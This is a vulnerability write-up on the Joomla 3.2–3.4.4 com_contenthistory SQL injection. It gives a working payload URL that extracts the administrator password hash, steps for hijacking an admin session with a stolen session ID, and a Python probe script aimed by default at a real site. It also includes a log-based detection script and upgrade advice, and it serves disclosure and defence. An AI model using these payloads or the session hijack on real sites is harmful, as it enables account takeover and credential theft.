Overview:

The vulnerability is in a core module, so no extension needs to be installed: every site running Joomla 3.2 or above is affected.

The SQL injection is in /administrator/components/com_contenthistory/models/history.php, in the getListQuery() function; the code is as follows:

[Image joomla-4: screenshot of the getListQuery() source]

When the following request is sent:

[Image joomla-3: screenshot of the request]

the injection returns session IDs from the database:

[Image joomla-1: screenshot of the session IDs returned by the injection]

If one of the returned values is an administrator's session ID, replacing the session ID in the current browser's cookies with it and then visiting /administrator/ logs you into the administrator back end.

[Image joomla-2: screenshot of the administrator back end]

With a refinement, the following payload fetches the administrator password hash directly:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Here %23__ (the URL-encoded form of #__) is Joomla's table-prefix placeholder. There is no need to discover the real table prefix, because Joomla automatically replaces #__ with it.

[Image select_concat: screenshot of the payload's result]

The returned value is $2y$10$Q8EO/7wagz3TxNvUyiFB1eMRBpv45jX2Jvk251ArYlV7p3.OC0hNa1; drop the trailing 1 (the floor(rand(0)*2) digit that concat() appended), and what remains is the bcrypt hash, which can then be cracked.
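From the defender's side, the payload structure explained above is easy to spot in web server logs: a legitimate list[select] or list[ordering] value for this view is nothing more than a comma-separated list of column identifiers, whereas the injection carries a parenthesised subquery. The script below is an added example (not code from the original post or from the Joomla project): it parses constructed Apache combined-format log lines, decodes the query string (so the %23__ prefix placeholder comes back as #__), and flags com_contenthistory requests whose list[...] parameters contain anything other than plain column identifiers. The log lines, IP addresses and the identifier allow-list are assumptions made for the example; the allow-list illustrates what a safe value looks like and is not Joomla's own validation code.

```python
#!/usr/bin/env python3
"""Flag com_contenthistory requests whose list[...] parameters are not plain column lists.

Added example for the post above, not part of the original page or of Joomla.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
# Line 1: the normal history view (ordering by a column).  Line 2: the payload
# from the post, sent against list[select].  Line 3: an unrelated component.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Oct/2015:10:01:02 +0000] "GET /joomla/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]=h.save_date&list[direction]=desc HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Oct/2015:10:02:45 +0000] "GET /joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select%201%20from%20(select%20count(*),concat((select%20(select%20concat(password))%20from%20%23__users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 0 "-" "python-requests/2.7.0"
10.0.0.7 - - [22/Oct/2015:10:03:10 +0000] "GET /joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Allow-list (assumption for this example): a value is acceptable only if it is a
# comma-separated list of identifiers such as h.version_id or a.title.  Parentheses,
# keywords and literals, which every form of the injection needs, never match.
IDENT = r'(?:[A-Za-z_][A-Za-z0-9_]*\.)?[A-Za-z_][A-Za-z0-9_]*'
IDENT_LIST_RE = re.compile(r'^\s*' + IDENT + r'(?:\s*,\s*' + IDENT + r')*\s*$')

# The list[...] keys that end up inside the generated SQL.
CHECKED_KEYS = ("list[select]", "list[ordering]", "list[fullordering]")


def suspicious_list_params(uri):
    """Return {param: decoded value} for list[...] params that are not plain column lists.

    Only requests to option=com_contenthistory are examined; other components
    return an empty dict.
    """
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_contenthistory":
        return {}
    findings = {}
    for key in CHECKED_KEYS:
        for value in params.get(key, []):
            if value == "":  # an empty ordering is what the normal view sends
                continue
            if not IDENT_LIST_RE.match(value):
                findings[key] = value
    return findings


def scan_log(text):
    """Return one finding per log line whose request carries a suspicious list[...] value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-log line; skip it
        bad = suspicious_list_params(m.group("uri"))
        if bad:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "params": bad,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]}')
        for name, value in hit["params"].items():
            print(f"    {name} = {value}")
```

Run against the constructed sample, only the second line is reported, with list[select] decoded so the analyst sees the #__users reference and the password column by name. The same allow-list is the shape of check a hardened list model should apply before any list[...] value reaches the query builder: accept identifiers, reject everything else.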


Joomla 3.2.0 - 3.4.4 history.php SQLi

[python]

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Detection script from the post (ported to Python 3): sends the probe from the
# page, whose injected subquery selects the hex literal
# 0x73656370756c73655f636f6d ("secpulse_com"), and checks whether that marker
# is reflected in the response.

import requests


def Joomla_history_SQLi(url):
    urlA = url+'/index.php%3Foption%3Dcom_contenthistory%26view%3Dhistory%26list%5Bordering%5D%3D%26item_id%3D1%26type_id%3D1%26list%5Bselect%5D%3D%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%200x73656370756c73655f636f6d%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29'
    try:
        # .text (not .content) so the marker can be searched as a string in Python 3
        result = requests.get(urlA, timeout=5, allow_redirects=True, verify=False).text
        if 'secpulse_com' in result:
            print('Joomla 3.2.0 - 3.4.4 history.php SQLi Found!')
        else:
            print('No vuls')
    except Exception as e:
        print(e)


if __name__ == '__main__':
    Joomla_history_SQLi('http://www.secpulse.com')

[/python]


Affected versions and remediation:

3.2 to 3.4.4

If you are running one of these older Joomla versions, update immediately to the latest official release: https://github.com/joomla/joomla-cms/releases/download/3.4.5/Joomla_3.4.5-Stable-Full_Package.zip


More technical details:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
